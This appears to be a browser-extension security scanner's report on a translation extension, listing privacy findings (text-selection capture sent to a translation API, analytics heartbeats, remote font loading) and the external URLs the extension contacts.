js/content.js (line 1)A mouseup event listener is attached to every page's document, monitoring all text selection activity across every website the user visits due to the <all_urls> host permission. Every text range selection is captured โ€ฆ
59Unauthorized Data Collection
medium
js/content.js (line 2)The selected text (selectionNode.toString()) from any page is transmitted to translate.googleapis.com using the undocumented 'gtx' client identifier, which is typically used by unofficial scraper clients rather than lโ€ฆ
60Tracking
low
js/background.js (line 133)The extension implements a persistent background heartbeat that sends an anonymous 'run' event to Google Analytics every 60 minutes using the GA4 Measurement Protocol. While intended for usage telemetry, this providesโ€ฆ
61Tracking
low
css/content.css (line 1)The content script stylesheet loads a remote Google Fonts stylesheet via @import at injection time on every page the extension is loaded into. Because the extension is injected into all URLs, every page visit causes tโ€ฆ
62Tracking
low
css/content.css (line 1)The content script CSS injected into every page the user visits loads a Google Fonts resource via @import on every page load. This causes the user's browser to make an outbound request to fonts.googleapis.com on everyโ€ฆ
63Tracking
low
css/content.css (line 1)The content script CSS loads a Google Fonts stylesheet via an external @import on every page the content script runs โ€” which is all URLs given the <all_urls> host permission. This causes an outbound network request toโ€ฆ
URLs
9
IPv4
0
IPv6
0

URLs

View the external URLs this extension communicates with to understand its network activity and data interactions.

Gain full insight into all external connections.

Upgrade for full visibility.

fonts.googleapis.com/css2https://fonts.googleapis.com/css2?family=Inter:wght@300;400&display=swap
getbootstrap.com-https://getbootstrap.com/
github.com/twbs/bootstrap/blob/main/LICENSEhttps://github.com/twbs/bootstrap/blob/main/LICENSE
www.w3.org/2000/svghttp://www.w3.org/2000/svg
github.com/uuidjs/uuidhttps://github.com/uuidjs/uuid#getrandomvalues-not-supported
www.google-analytics.com/collecthttps://www.google-analytics.com/collect?${new
translate.googleapis.com/translate_a/singlehttps://translate.googleapis.com/translate_a/single?dt=t&dt=bd&dt=qc&dt=rm&dt=ex
translate.google.com/mhttps://translate.google.com/m
clients2.google.com/service/update2/crxhttps://clients2.google.com/service/update2/crx

Gain full insight into all external connections.

Upgrade for full visibility.

No IP addresses found
Showing 1 to 10 of 10 rows
Rows per page:

Code Diff

Compare extension code between any two versions.

0 changed files (scanned top 25 shared text files)

No comparable text files found between these versions.

Browse and explore files within this extension package

Gain full insight into all external connections.

Upgrade for full visibility.